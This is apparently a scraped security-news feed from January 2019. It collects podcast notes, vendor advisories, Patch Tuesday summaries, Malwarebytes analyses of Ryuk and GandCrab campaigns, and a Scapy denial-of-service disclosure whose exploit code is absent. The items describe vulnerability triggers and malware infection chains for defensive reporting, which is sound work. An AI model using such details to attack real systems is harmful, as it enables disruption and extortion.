When the Cold Springs Fire tore through 528 acres of Boulder County, Colo., Director of Emergency Management Mike Chard took to social media.
In a previous post, Tripwire asked contributors what their most memorable event of 2018 was. As a follow-up, guest author Bob Covello expands on his thoughts about two-factor authentication (2FA). We in the infosec community have made enormous progress towards getting multi-factor authentication the recognition it deserves. All the respected folks in the community have […]… Read More
- The NSA announces the forthcoming release of an internal powerful reverse-engineering tool for examining and understanding other people's code.
- Emergency out-of-cycle patches from both Adobe and Microsoft.
- PewDiePie hacker strikes again.
- Prolific 0-day dropper SandboxEscaper ruffles some feathers.
- A new effort by the US government to educate industry about the risks of Cyber attacks.
- Welcome news on the ransomware front.
- VERY welcome news of a new Windows 10 feature.
- A note about a just-published side-channel attack on OS page caches.
We invite you to read our show notes.
Download or subscribe to this show at https://twit.tv/shows/security-now.
You can submit a question to Security Now! at the GRC Feedback Page.
11 patches ship on Patch Tuesday
While you were sighing your way through Microsoft's Patch Tuesday, enterprise vendor SAP slid 11 security advisories under your door.…
In this week’s show Adam Boileau and Patrick Gray discuss the security news of the last few weeks, including:
- German politicians pwnt, suspect arrested
- Possible ransomware attack affects US newspapers
- Mass 2FA bypasses impacting Gmail users in Middle East
- Emergency warning system in Australia popped
- Ethereum Classic double-spend attack a sign of things to come
- EU to fund open source bug bounties
- Attackers steal details of 1,000 North Korean defectors
- Doing the Bloomberg hack for real at 35C3
- El Chapo should have used Signal
- Much, much more…
This week’s show is brought to you by Cylance! BlackBerry announced that it’s acquiring Cylance for $1.4bn (I don’t know if that’s closed yet) which is great news for all the founders and early employees there – some of whom I know reasonably well. So congrats to team Cylance on that!
But we’re not talking about that this week. Instead, Cylance’s very own Scott Scheferman joins us to talk about the MITRE ATT&CK framework and how it’s informing their product dev. There’s some product talk in that interview but there’s also some real meat there so I let it run long. Scott says we’re close to the terrible situation where security companies are going to start using MITRE ATT&CK as a marketing tool, like “Full MITRE ATT&CK coverage!”
- Arrested German hacker confesses to leaking politicians' information, report says
- Before Germany’s Massive Hack, We Learned What Not to Do With Sensitive Stolen Information - Motherboard
- What we still don’t know about the cyberattack on Tribune newspapers - The Washington Post
- Ransomware suspected in cyberattack that crippled major US newspapers | ZDNet
- How Hackers Bypass Gmail 2FA at Scale - Motherboard
- Hackers target 'hundreds' of Middle East activists with fake login pages, 2FA bypass schemes
- Hackers send fake emergency emails, texts, messages using warning system
- Coinbase suspends Ethereum Classic (ETC) trading after double-spend attacks | ZDNet
- I Gave a Bounty Hunter $300. Then He Located Our Phone - Motherboard
- EU to fund bug bounty programs for 14 open source projects starting January 2019 | ZDNet
- Hackers hijack thousands of Chromecasts to warn of latest security bug | TechCrunch
- Hackers steal personal info of 1,000 North Korean defectors | ZDNet
- Modchips - Trammell Hudson's Projects
- Hacking Group Decrypts Cache of Insurance Files Related to 9/11 Attacks - Motherboard
- Hackers Make a Fake Hand to Beat Vein Authentication - Motherboard
- You Can Now Get $1 Million for Hacking WhatsApp and iMessage - Motherboard
- Alan Feuer on Twitter: "In February 2010, an undercover FBI agent met with the target of a sensitive investigation: Christian Rodriguez, an IT specialist who had recently developed a remarkable product: an encrypted communication network for the Mexican drug lord El Chapo and his Colombian partners."
- Encrypted Messaging App Signal Says It Won’t Comply With Australia’s New Backdoor Bill - Motherboard
- Louis Theroux among those hit by Twitter hack exposing security flaw | Technology | The Guardian
- NSA to release a free reverse engineering tool | ZDNet
- Open-source tool aims to curb BGP hijacking amid Chinese espionage concerns
- ARTEMIS — neutralizing BGP hijacking within a minute | APNIC Blog
- New hardware-agnostic side-channel attack works against Windows and Linux | ZDNet
- Презентация PowerPoint
- CVE-2019-0547 | Windows DHCP Client Remote Code Execution Vulnerability
Technological advancements, an evolving threat landscape, and sophisticated nation-state actors will impact how organizations mitigate risk in the coming year.
Technological advancements, an evolving threat landscape, and sophisticated nation-state actors will impact how organizations mitigate risk in the coming year.
A vulnerability in the web-based management interface of Cisco Content Security Management Appliance (SMA) Software could allow an unauthenticated, remote attacker to conduct a cross-site scripting (XSS) attack against a user of the web-based management interface.
The vulnerability is due to insufficient validation of user-supplied input by the web-based management interface of an affected device. An attacker could exploit this vulnerability by persuading a user of the interface to click a maliciously crafted link. A successful exploit could allow the attacker to execute arbitrary script code in the context of the affected interface or access sensitive, browser-based information.
There are no workarounds that address this vulnerability.
This advisory is available at the following link:
Security Impact Rating: Medium
Few fields and industries change as rapidly as those in the technology sector. This fast-moving, adaptable and growing sector creates new applications, new devices, and new efficiencies designed to make our everyday lives easier — sometimes in ways we’ve never imagined. But more devices and applications, from a security standpoint, means cybercriminals could have more opportunities to take advantage of flaws to conduct attacks. Additionally, the rapid growth in both software and hardware means today’s consumers are tasked with securing a plethora of personal devices.
This is not a sustainable path to a secure today’s technology landscape, one that’s continually growing and changing with each new addition. If we are going to continue to build a robust future, one including the rich potential inherent in Internet of Things (IoT) devices, we need a dynamic security solution that scales to meet the needs of modern-day society.
And that need is growing. According to a study from Market Research Future, the IoT market is set to potentially reach $124 billion in value by 2023 — only five years from now. Plus, Gartner predicts that there will be over 20 billion smart devices by 2020. That number is likely to grow, too.
That’s why we’ve worked with Verizon to launch Home Network Protection (HNP), a comprehensive security platform powered by McAfee Secure Home Platform, which has been designed to help safeguard consumers’ home networks. It does so through a robust, secure router designed to shield both traditional and newer IoT devices from malicious websites. It’s a proactive approach designed to keep consumer devices as safe as possible.
Customers using Fios by Verizon, a 100 percent fiber-optic network, and the Fios Quantum Gateway router can use HNP to secure their internet-connected devices, including smart cameras, baby monitors, television sets, and thermostats.
This is a massive milestone for consumer security in today’s digital age. Through a single provider, millions of consumers can access seamless protection from the latest threats — making modern conveniences easier to secure.
The post Verizon Teams Up with McAfee to Secure Today’s Connected Home appeared first on McAfee Blogs.
Hyper-V, DHCP, Word, and more. Plus, bonus shock: Adobe spares Flash in January patch dump
Patch Tuesday Microsoft has released the first Patch Tuesday bundle of the year, patching up 49 CVE-listed security vulnerabilities and issuing two advisories.…
Owners claim security vulns have damaged resale price
A class-action lawsuit claiming Fiat-Chrysler knew about, but failed to fix, significant cybersecurity holes in its cars will go to trial in America later this year.…
Threats are constantly evolving and, just like everything else, tend to follow certain trends. Whenever a new type of threat is especially successful or profitable, many others of the same type will inevitably follow. The best defenses need to mirror those trends so users get the most robust protection against the newest wave of threats. Along those lines, Gartner has identified the most important categories in cybersecurity technology for the immediate future.
We wanted to dive into the newest cybersecurity products and services from those hot categories that Gartner identified, reviewing some of the most innovative and useful from each group. Our goal is to discover how cutting-edge cybersecurity software fares against the latest threats, hopefully helping you to make good technology purchasing decisions.
5G conversation booms at CES 2019
More RSS Feed: newsroom.cisco.com/rss-feeds ...
We recently discovered that the latest version of Scapy, a powerful packet manipulation tool used by cybersecurity researchers and network engineers, is susceptible to a Denial of Service (DoS) vulnerability. Ironically, we found this vulnerability while researching ways to better detect and fight DDoS attacks.
Written in the very popular Python coding language, Scapy uses a heuristic algorithm to determine the type of network packet it is inspecting. Because the algorithm relies on port numbers, the packet type can be easily spoofed. In this case, the vulnerability occurs when Scapy is tricked into thinking a network packet is a RADIUS packet. The vulnerability is due to a lack of input validation when reading the length field in the RADIUS packet’s Attribute Value Pairs (AVP). This can cause an infinite loop in the following code section if a certain byte is set to zero:
When Scapy parses a UDP Radius packet that has an AVP with a length byte equal to zero, the getfield function doesn’t shorten the remain value in the while loop. This causes the loop to continue forever, resulting in a Denial of Service (DoS) to Scapy, causing Scapy to crash. This can potentially affect the health of an enterprise network – for instance, if Scapy is being used by IT to monitor network traffic, the monitoring process will stop functioning.
Although this bug was reported and patched, the current Scapy version 2.4.0 available from the Python pip repositories is susceptible to this attack. We tested for this vulnerability using macOS and Ubuntu Linux with both Python 2.7 and Python 3 and found them all vulnerable.
Here is the remote exploit:
Here is the patch:
The solution: clone and build Scapy directly from the github repo:
The current version of Scapy can be DoSed quite easily. The potential impact is large – Scapy is quite a popular tool, and other libraries that depend on Scapy might be vulnerable as well. Networks relying on Scapy for traffic monitoring or other functions can also be affected. If you’re using the affected version of Scapy, or any library that depends on Scapy, we advise you to apply the patch as soon as possible.
Advisory Scapy 2.4.0 – Denial of Services
Authors: Johnathan Azaria and Koby Kilimnik
Vendor url: https://scapy.net/
Status: Patched (but not released to pip repo)
Tested on: macOS sierra 10.12.6 and Ubuntu Linux 16.04
A partial list of libraries with a Scapy dependency that might be affected as well:
- mim-0.2.43 – man in the middle proxy
- ooniprobe-1.3.2 – network analysis tool
- pyersinia-1.0.5 – another network analysis tool
- pysap-0.1.8 – python library that communicates with sap
The post Scapy-sploit: Python Network Tool is Vulnerable to Denial of Service (DoS) Attack CVE pending appeared first on Blog.
Researchers have spotted a malvertising campaign that is delivering two payloads to victims: the Vidar information stealer and GandCrab ransomware.
Near the end of 2018, Malwarebytes Labs began tracking a malvertising campaign delivering a variety of payloads. Researchers analyzed the infection chain and traced it to the Fallout exploit kit. They observed this package downloading what they thought was the Arkei stealer, but a closer look revealed the malware to be Vidar, a customizable stealer of passwords, credit card details and digital wallet credentials.
At that point, Malwarebytes analysts looked into Vidar’s command-and-control (C&C) server, discovering that the attacks were retrieving GandCrab ransomware from that location. This sequence of events enables threat actors to first steal victims’ personal and financial information before extorting them for the return of their encrypted data.
A Busy Few Months for the Fallout Exploit Kit
The Fallout exploit kit has been busy over the past few months. In September 2018, FireEye observed the exploit kit targeting users in Japan, Korea, the Middle East, Southern Europe and other countries in the Asia-Pacific region. In that campaign, Fallout infected victims with GandCrab ransomware.
This package of exploits didn’t waste time in diversifying its payloads. Researchers at McAfee observed Fallout exposing users to Kraken ransomware in October 2018. That same month, Palo Alto Networks detected a campaign in which the exploit kit delivered Azorult malware, another threat capable of stealing important information.
How to Block GandCrab and Other Malvertising Payloads
As it continues to evolve, the Fallout exploit kit will likely begin delivering even more payloads. Security professionals should therefore help protect their organizations by consistently leveraging the four steps of vulnerability assessment to keep software up-to-date. Organizations should also help defend against ransomware like GandCrab by using an endpoint management solution to monitor their IT assets for suspicious activity.
The post Malvertising Campaign Delivers Vidar Information Stealer and GandCrab Ransomware appeared first on Security Intelligence.
Today’s VERT Alert addresses Microsoft’s January 2019 Security Updates. VERT is actively working on coverage for these vulnerabilities and expects to ship ASPL-812 on Wednesday, January 9th. In-The-Wild & Disclosed CVEs CVE-2019-0579 The Windows Jet Database Engine improperly handles objects in memory and, if an attacker can convince a victim to open a malicious file, […]… Read More
The post VERT Threat Alert: January 2019 Patch Tuesday Analysis appeared first on The State of Security.
Microsoft has released updates to address multiple vulnerabilities in Microsoft software. A remote attacker could exploit one of these vulnerabilities to take control of an affected system.
The National Cybersecurity and Communications Integration Center (NCCIC), part of the Cybersecurity and Infrastructure Security Agency (CISA), encourages users and administrators to review Microsoft’s January 2019 Security Update Summary and Deployment Information and apply the necessary updates.
While families gathered for food and merriment on Christmas Eve, most businesses slumbered. Nothing was stirring, not even a mouse—or so they thought.
For those at Tribune Publishing and Data Resolution, however, a silent attack was slowly spreading through their networks, encrypting data and halting operations. And this attack was from a fairly new ransomware family called Ryuk.
Ryuk, which made its debut in August 2018, is different from many other ransomware families we’ve analyzed, not because of its capabilities, but because of the novel way it infects systems.
So let’s take a look at this elusive new threat. What is Ryuk? What makes it different from other ransomware attacks? And how can businesses stop it and similar threats in the future?
What is Ryuk?
Ryuk first appeared in August 2018, and while not incredibly active across the globe, at least three organizations were hit with Ryuk infections over the course of the first two months of its operations, landing the attackers about $640,000 in ransom for their efforts.
Despite a successful infection run, Ryuk itself possesses functionality that you would see in a few other modern ransomware families. This includes the ability to identify and encrypt network drives and resources, as well as delete shadow copies on the endpoint. By doing this, the attackers could disable the Windows System Restore option for users, and therefore make it impossible to recover from the attack without external backups.
One interesting aspect of this ransomware is that it drops more than one note on the system. The second note is written in a polite tone, similar to notes dropped by BitPaymer ransomware, which adds to the mystery.
Similarities with Hermes
Inside of both Ryuk and Hermes, there are numerous instances of similar or identical code segments. In addition, several strings within Ryuk have been discovered that refer to Hermes—in two separate cases.
When launched, Ryuk will first look for the Hermes marker that is inserted into each encrypted file. This is a means to identify if the file or system has already been attacked and/or encrypted.
The other case involves whitelisted folders, and while not as damning as the first, the fact that both ransomware families whitelist certain folder names is another clue that the two families might share originators. For example, both Ryuk and Hermes whitelist a folder named “Ahnlab”, which is the name of a popular South Korean security software.
If you know your malware, you might remember that Hermes was attributed to the Lazarus group, who are associated with suspected North Korean nation-state operations. This has led many analysts and journalists to speculate that North Korea was behind this attack.
We’re not so sure about that.
Multiple notable Ryuk attacks have occurred over the last few months primarily in the United States, in which the ransomware infected large numbers of endpoints and demanded higher ransoms than what we typically see (15 to 50 Bitcoins).
One such attack was on the Onslow Water and Sewer Authority (OWASA) on October 15, 2018, which kept the organization from being able to use their computers for a time. While water and sewage services, as well as customer data, were untouched by the ransomware attack, it still caused significant damage to the organization’s network and resulted in numerous databases and systems being rebuilt from the ground up.
Here is the running theory: Emotet makes the initial infection on the endpoint. It has its own abilities to spread laterally throughout the network, as well as launch its own malspam campaign from the infected endpoint, sending additional malware to other users on the same or different networks.
From there, the most common payload that we have seen Emotet drop over the last six months has been TrickBot. This malware has the capability to steal credentials, and also to move around the network laterally and spread in other ways.
Both TrickBot and Emotet have been used as information stealers, downloaders, and even worms based on their most recent functionality.
At some point, for reasons we will explore later in this post, TrickBot will download and drop Ryuk ransomware on the system, assuming that the infected network is something that the attackers want to ransom. Since we don’t see even a fraction of the number of Ryuk detections as we see of Emotet and TrickBot through our product telemetry, we can assume that it’s not the default standard operation to infect systems with Ryuk after a time, but rather something that is triggered by a human attacker behind the scenes.
Let’s take a look at the stats for Emotet, Ryuk, and TrickBot from August until present-day and see if we can’t identify a trend.
The blue line represents Emotet, 2018’s biggest information-stealing Trojan. While this chart only shows us August onward, rest assured that for much of the year, Emotet was on the map. However, as we sailed into Q4 2018, it became a much bigger problem.
The orange line represents TrickBot. These detections are expected to be lower than Emotet, since Emotet is usually the primary payload. This means that in order for TrickBot to be detected, it must have either been delivered directly to an endpoint or dropped by an Emotet infection that was undetected by security software or deployed on a system without it. In addition, TrickBot hasn’t been the default payload for Emotet for the entire year, as the Trojan has continuously swapped payloads, depending on time of year and opportunity.
Based on this, to get hit with Ryuk (at least until we figure out the real intention here) you would need to have either disabled, not installed, or not updated your security software. You would need to refrain from conducting regular scans to identify TrickBot or Emotet. You would need to either have unpatched endpoints or weak credentials for TrickBot and Emotet to move laterally throughout the network and then, finally, you would need to be a target.
That being said, while our detections of Ryuk are small compared to the other families on this chart, that’s likely because we caught the infection during an earlier stage of the attack, and the circumstances for a Ryuk attack need to be just right—like Goldilocks’ porridge. Surprisingly enough, organizations have created the perfect environment for these threats to thrive. This may also be the reason behind the huge ransom payment, as fewer infections lead to fewer payouts.
While active earlier in the year, Ryuk didn’t make as many headlines as when it launched its “holiday campaign,” or rather the two largest sets of Ryuk infections, which happened around Christmastime.
The chart below shows our detection stats for Ryuk from the beginning of December until now, with the two infection spikes noted with stars.
These spikes show that significant attacks occurred on December 24 and December 27.
Data Resolution attack
The first attack was on Dataresolution.net, a Cloud hosting provider, on Christmas Eve. As you can see from above, it was the most Ryuk we had detected in a single day over the last month.
According to Data Resolution, Ryuk was able to infect systems by using a compromised login account. From there, the malware gave control of the organization’s data center domain to the attackers until the whole network was shut down by Data Resolution.
The company assures customers that no user data was compromised, and the intent of the attack was to hijack, not steal. Although, knowing how this malware finds its way onto an endpoint in the first place is a good sign that they’ve probably lost at least some information.
Tribune Publishing attack
Our second star represents the December 27 attack, when multiple newsprint organizations under the Tribute Publishing umbrella (now or in the recent past) were hit with Ryuk ransomware, essentially disabling these organizations’ ability to print their own papers.
The attack was discovered late Thursday night, when one of the editors at the San Diego Union-Tribune was unable to send finished pages to the printing press. These issues have since been resolved.
We believe Ryuk is infecting systems using Emotet and TrickBot to distribute the ransomware. However, what’s unclear is why criminals would use this ransomware after an already-successful infection.
In this case, we can actually take a page from the Hermes playbook. We witnessed Hermes being used in Taiwan as a means to cover the tracks of another malware family already on the network. Is Ryuk being used in the same way?
Since Emotet and TrickBot are not state-sponsored malware, and they are usually automatically launched to a blanket of would-be victims (rather than identifying a target and being launched manually), it seems odd that Ryuk would be used in only a few cases to hide the infection. So perhaps we can rule this theory out.
A second, more probable theory is that the purpose of Ryuk is as a last ditch effort to extort more value from an already-juicy target.
Let’s say that the attackers behind Emotet and TrickBot have their bots map out networks to to identify a target organization. If the target has a large enough infection spread of Emotet/TrickBot, and/or if its operations are critical or valuable enough that disruption would trigger an inclination to pay the ransom, then that might make them the perfect target for a Ryuk infection.
The true intention for using this malware can only be speculated at this point. However, whether it’s hiding the tracks of other malware or simply looking for ways to make more cash after stealing all the relevant data they could, businesses should be wary of writing this one off.
The fact remains that there are thousands of active Emotet and TrickBot infections all over the world right now. Any of the organizations that are dealing with these threats need to take them seriously, because an information stealer might turn into nasty ransomware at any time. This is the truth of our modern threat landscape.
As mentioned earlier, many analysts and journalists have decided that North Korea is the most likely attacker to be distributing Ryuk. While we can’t completely rule this out, we aren’t entirely sure it’s accurate.
Ryuk does match Hermes in many ways. Based on the strings found, it was likely built on top of, or is a modified version of Hermes. How the attackers got the source code is unknown, however, we have observed instances where criminals were selling versions of Hermes on hacker forums.
This introduces another potential reason the source code got into the hands of a different actor.
Identifying the attribution of this attack based on similarities between two families, one of which is associated with a known nation-state attack group (Lazarus) is a logical fallacy, as described by Robert M. Lee in a recent article, “Attribution is not Transitive – Tribute Publishing Cyber Attack as a Case Study.” The article takes a deeper dive into the errors of attribution based on flimsy evidence. We caution readers, journalists, and other analysts on drawing conclusions from correlations.
Now that we know how and potentially why Ryuk attacks businesses, how can we protect against this malware and others like it?
Let’s focus on specific technologies and operations that are proven effective against this threat.
The use of exploits for both infection and lateral movement has been increasing for years. The primary method of infection for Emotet at the moment is through spam with attached Office documents loaded with malicious scripts.
While you can stop these threats by training users to recognize social engineering attempts or use an email protection platform that recognizes malicious spam, using anti-exploit technology can also block those malicious scripts from trying to install malware on the system.
In addition, using protection technologies, such as anti-ransomware add immense amounts of protection against ransomware infections, stopping them before they can do serious damage.
Regular, updated malware scans
This is a general rule that has been ignored enough times to be worth mentioning here. In order to have effective security solutions, they need to be used and updated frequently so they can recognize and block the latest threats.
In one case, the IT team of an organization didn’t even know they were lousy with Emotet infections until they had updated their security software. They had false confidence in a security solution that wasn’t fully armed with the tools to stop the threats. And because of that, they had a serious problem on their hands.
This is a tactic that we have been recommending for years, especially when it comes to protecting against ransomware. To ensure that you don’t lose your mapped or networked drives and resources if a single endpoint gets infected, it’s a good idea to segment access to certain servers and files.
There are two ways to segment your network and reduce the damage from a ransomware attack. First, restrict access to certain mapped drives based on role requirements. Second, use a separate or third-party system for storing shared files and folders, such as Box or Dropbox.
This last year has brought with it some novel approaches to causing disruption and devastation in the workplace. While ransomware was the deadliest malware for businesses in 2017, 2018 and beyond look to bring us multiple malware deployed in a single attack chain.
What’s more, families like Emotet and TrickBot continue to evolve their tactics, techniques, and capabilities, making them more dangerous with each new generation. While today, we might be worried about Emotet dropping Ryuk, tomorrow Emotet could simply act as ransomware itself. It’s up to businesses and security professionals to stay on top of emerging threats, however minor they may appear, as they often signal a change in the shape of things to come.
Thanks for reading and safe surfing!
The post Ryuk ransomware attacks businesses over the holidays appeared first on Malwarebytes Labs.
Microsoft released its monthly security update today, disclosing a variety of vulnerabilities in several of its products. The latest Patch Tuesday covers 49 vulnerabilities, seven of which are rated “critical,” 40 that are considered “important” and one that is “moderate.” This release also includes a critical security advisory for multiple bugs in Adobe Flash Player.
This month’s security update covers security issues in a variety of Microsoft’s products, including the Jet Database Engine, Office SharePoint and the Chakra Scripting Engine. For coverage of these vulnerabilities, read the SNORTⓇ blog post here.
Microsoft disclosed seven critical vulnerabilities this month, which we will highlight below.
CVE-2019-0550 and CVE-2019-0551 are remote code execution vulnerabilities in Windows Hyper-V, a native hypervisor that can create virtual machines. These bugs exist due to the way a host server fails to properly validate input from an authenticated user on a guest operating system. An attacker could exploit these vulnerabilities by running a specially crafted application on a guest operating system that could cause the Hyper-V host operating system to execute arbitrary code.
CVE-2019-0539, CVE-2019-0567 and CVE-2019-0568 are memory corruption vulnerabilities in the way the Chakra Scripting Engine handles objects in memory on the Microsoft Edge web browser. An attacker could corrupt memory in a way that would allow them to execute code in the context of the current user. In order to trigger this vulnerability, a user would have to visit a specially crafted, malicious web page in Edge.
CVE-2019-0547 is a memory corruption vulnerability in the Windows DHCP client that exists when an attacker sends specially crafted DHCP responses to a client. An attacker could gain the ability to run arbitrary code on the client machine if they successfully exploit this vulnerability.
CVE-2019-0565 is a memory corruption vulnerability in Microsoft Edge that occurs when the web browser improperly handles objects in memory. An attacker could corrupt memory in a way that would allow them to execute arbitrary code in the context of the current user. A user would trigger this vulnerability if they visited a specially crafted, malicious web page in Edge.
Important vulnerabilitiesThis release also contains 40 important vulnerabilities, four of which we will highlight below.
CVE-2019-0555 is an escalation of privilege vulnerability in the Microsoft XmlDocument class that could allow an attacker to escape the AppContainer sandbox. An attacker could exploit this flaw to gain elevated privileges and break out of the Microsoft Edge AppContainer sandbox. While this vulnerability does not allow arbitrary code to run explicitly, it could be combined with other vulnerabilities to take advantage fo the elevated privileges while running.
CVE-2019-0572, CVE-2019-0573 and CVE-2019-0574 are elevation of privilege vulnerabilities in Windows Data Sharing that lie in the way the service improperly handles file operations. An attacker could exploit this vulnerability by running a specially crafted application to gain the ability to run processes in an elevated context.
ModerateThe only moderate vulnerability in this release is CVE-2019-0546, a remote code execution vulnerability in Microsoft Visual Studio.
CoverageIn response to these vulnerability disclosures, Talos is releasing the following SNORTⓇ rules that detect attempts to exploit them. Please note that additional rules may be released at a future date and current rules are subject to change pending additional information. Firepower customers should use the latest update to their ruleset by updating their SRU. Open Source Snort Subscriber Rule Set customers can stay up-to-date by downloading the latest rule pack available for purchase on Snort.org.
Snort rules: 48768 - 48770, 48773 - 48780, 48783, 48787 - 48790, 48793 - 48795, 48798, 48807 - 48810, 48876
Rights warrior ticked off after yet another report of whereabouts being flogged to dodgy geezers
US Senator Ron Wyden is renewing his calls for legislation banning the sale of people's private cellphone location information after yet another report of phone carriers doing exactly that.…
In the first post of this series, we talked about the practices that will optimize your site and increase its resilience to DDoS attacks. In the second post, we focused on caching best practices that can reduce the chances of a DDoS attack taking down your site. Today, we are going to emphasize the importance of having a Web Application Firewall.
What is a Web Application Firewall?
A web application firewall (WAF) is a firewall that filters, monitors, and blocks HTTP/HTTPS traffic to and from a web application.
The man confessed to be responsible for leaking private information of hundreds of politicians and celebrities
At Recorded Future, our technology has enabled research that pulls back the covers on places our opponents would rather we didn’t. In 2018, our threat analysts made some truly substantial findings — we found sensitive documents on military drones for sale on the dark web, looked at trends in cybercriminal use of cryptocurrency, and identified patterns in the tactics, techniques, and procedures of Chinese and Russian hackers and government agencies.
Understanding the underlying motivations of different cybercriminals is one of the things threat intelligence is uniquely about — getting context that helps you understand your foes is essential to preventing their attacks.
Most of this research is produced in-house by our very own Insikt Group (“insikt” is Swedish for “insight”), a team of expert analysts who each have on average over a decade of experience in fields like law enforcement, intelligence, and incident response. As we step into the new year, we thought we’d highlight some of our best and most popular pieces of research from 2018, in case you missed any of them.
1. Military Reaper Drone Documents Leaked on the Dark Web
The Insikt Group regularly monitors criminal activities across the dark web as part of their research. In June 2018, our team came across the attempted sale of highly sensitive U.S. Air Force documents, including maintenance documents relating to the MQ-9 Reaper unmanned aerial vehicle (UAV).
The team was able to contact the hacker involved and confirmed the authenticity of the leaked documents, which also included an M1 Abrams maintenance manual, a tank platoon training course, a crew survival course, and documentation on improvised explosive device (IED) mitigation tactics.
The hacker used a previously disclosed vulnerability in Netgear routers to gain access to the documents through the computer of a member of the U.S. military stationed at Creech Air Force Base in Nevada, where the U.S. Air Force’s 432d Wing operates Reaper drones.
This report, which was picked up by major publications like CNN, Forbes, and The Wall Street Journal, highlighted how “a single hacker with moderate technical skills [can] identify several vulnerable military targets and exfiltrate highly sensitive information in a week’s time,” providing “a disturbing preview of what a more determined and organized group with superior technical and financial resources could achieve.”
2. Litecoin Emerges as the Next Dominant Dark Web Currency
Cryptocurrency has been a game changer for cybercriminals, allowing them to conduct major transactions (and ask for ransoms in malware attacks) in relative privacy without needing to launder their money through more reputable institutions like banks. But crypto hasn’t exactly been stable, either. Beyond the heavily fluctuating value, Bitcoin in particular has suffered from rising mining and transaction costs, making it increasingly infeasible for day-to-day use.
As early as 2016, criminals began voicing their dissatisfaction with the performance and cost of Bitcoin and looking for alternative cryptocurrencies (the term “altcoin” refers to any standard that isn’t Bitcoin). Insikt Group took a deep dive into 150 of the biggest message boards, marketplaces, and illicit services on the dark web and determined that Litecoin was quickly becoming the second most popular cryptocurrency after Bitcoin.
This story, which was picked up by Bloomberg and Fortune, also highlighted some of the quirks of the cybercriminal underground, including how many of them see themselves as business people like any other who happen to be involved with illegal activities. Take this statement from one Russian-speaking user on a criminal discussion board, which would not be out of place in a Yelp review:
3. Iran’s Hacker Hierarchy Exposed
In our increasingly digital world, cyberattacks continue to become more devastating tools in the arsenal of nation-states seeking to undermine their enemies. That’s certainly been the case for the Islamic Republic of Iran, which since 2009 has regularly responded to sanctions or perceived provocations by conducting offensive cyber campaigns.
For this research piece, Insikt Group interviewed a former Iranian hacker who started one of Iran’s first security forums and gathered further information through the Recorded Future platform, third-party metadata, and open source intelligence (OSINT) techniques. They determined that Iranian cyberattacks against the West were likely to follow the economic sanctions levied against Iran by the United States in May 2018, with the highest-risk targets being banks and financial services, government departments, critical infrastructure providers, and oil and energy institutions.
They also examined the hierarchical structure of state-sponsored Iranian hackers, finding that Iranian cyber operations are usually conducted through a tiered approach, where an ideologically and politically trusted group of middle managers translate intelligence priorities into segmented cyber tasks which are then bid out to multiple contractors who are pitted against each other.
Given the Iranian government’s baseline of paranoia and propaganda, the situation creates unique trade-offs in Iran’s government-sanctioned offensive cyber campaigns — “individuals with demonstrated adherence to the government’s ideology and individuals with the greatest offensive cyber skills are almost always mutually exclusive,” the report finds.
4. Thieves and Geeks: Russian and Chinese Hacking Communities
Are hackers all motivated by the same objectives and ideologies across cultures, or do unique subcultures emerge in different parts of the world? In this analysis, Insikt Group took a close look at Russian and Chinese hacking communities and identified stark differences between the two. To gather information, researchers analyzed advertisements, posts, and interactions within hacking and criminal forums, finding that each country’s hackers had their own codes of conduct, payment methods, motivations, and more.
Generally, Russian hackers can be characterized as valuing money above anything else, and their practices give weight to the old adage that there’s no honor among thieves. Russian underground forums are places of business, not communities — reputations are directly tied to how consistently good your product is and how reliable you are much more than a shared patriotic spirit or anything else. Lose your good reputation, and you’ll be blacklisted.
Chinese hackers, on the other hand, appear much more closely bound together by patriotism and “geek spirit,” a translated term that denotes a hacker culture that seeks to create a better society. Chinese cyberattacks are often politically motivated and driven by a sense of community.
5. Chinese Cyberespionage Originating From Tsinghua University Infrastructure
In August 2018, Insikt Group found evidence of Chinese cyberespionage against various targets, including communities in Tibet, that originated from infrastructure registered to Tsinghua University, an elite Chinese academic institution.
The research highlighted a few key characteristics common to Chinese cyber activity — the depth and scale of sophisticated techniques used by the Chinese state against perceived domestic threats like Tibet, their savvy use of cyber activity in support of their economic development goals around the world, and the blurred lines between third-party and state-sponsored actors in the country.
“The People’s Republic of China (PRC) claims sovereignty over Tibet and regards all Tibetan independence movements as separatist threats,” Insikt Group explains in this piece, which was picked up by Reuters. “While the PRC uses many forms of coercion against the Tibetan community, cyberespionage against Tibetan targets has become a frequently used tool, especially during times of heightened tensions.”
And regarding China’s use of cyber activity to further their development goals, Insikt Group found network reconnaissance activities conducted from the same Tsinghua University infrastructure targeting various geopolitical organizations — groups like the Alaska state government, the United Nations office in Nairobi, and the Kenya Ports Authority — at the same time that those groups had dialogues with Chinese representatives.
Stay Informed Daily
Our biggest stories and research pieces will continue to be shared publicly right here on our blog, but if you’re looking for an easy and quick way to get more threat information, try out our Cyber Daily newsletter.
Sign up for it now to get daily top trending results on technical indicators as reported by the web — free and all in one place. For security professionals, it’s one of the best ways to start your day.
The post Reapers, Cryptos, and More: Our Top 5 Research Pieces From 2018 appeared first on Recorded Future.
We’ve officially touched down in Las Vegas for CES 2019!
If you aren’t familiar with CES, it is the global stage for innovators to showcase the next generation of consumer technologies. With the growing consumer technology landscape, we understand the importance of creating new solutions for those who want to live their connected lives with confidence. That’s why we’ve made some exciting new additions to our security lineup and employed multiple partnerships with other innovators like Google and Verizon to help protect users’ online safety. Check out all the details, here.
To celebrate the latest innovations, we’re giving two  lucky people the chance to win a $500 Amazon gift card. Not heading to CES this year? No problem! Simply retweet one of our official contest tweets with the required hashtags between January 8th – 11th for your chance to win. Follow the instructions below to enter, and good luck!
#RT2Win Sweepstakes Official Rules
- To enter, follow @McAfee_Home on Twitter and find the #RT2Win sweepstakes tweet.
- The sweepstakes tweet will be released on Tuesday, January 8, 2019 at 8:00 a.m. PT. This tweet will include the hashtags: #McAfeeAtCES, #RT2Win, AND #Sweepstakes.
- Retweet the sweepstakes tweet released on the above date from your own handle. The #McAfeeAtCES, #RT2Win AND #Sweepstakes hashtags must be included to be entered.
- Make sure you’re following @McAfee_Home on Twitter! You must follow for your entry to count.
- Sweepstakes will end on Friday, January 11, 2019 at 11:59 p.m. PST. All entries must be made before that date and time.
- Winners will be notified on Monday, January 14, 2019 via Twitter direct message.
- Limit one entry per person.
1. How To Win
Retweet one of our contest tweets on @McAfee_Home that include “#McAfeeAtCES, #RT2Win, AND #Sweepstakes” for a chance to win a $500 Amazon gift card (for full prize details please see “Prizes” section below). Two  total winners will be selected and announced on January 14, 2019. Winners will be notified by direct message on Twitter. For full Sweepstakes details, please see the Terms and Conditions, below.
#RT2Win Sweepstakes Terms and Conditions
2. How to Enter:
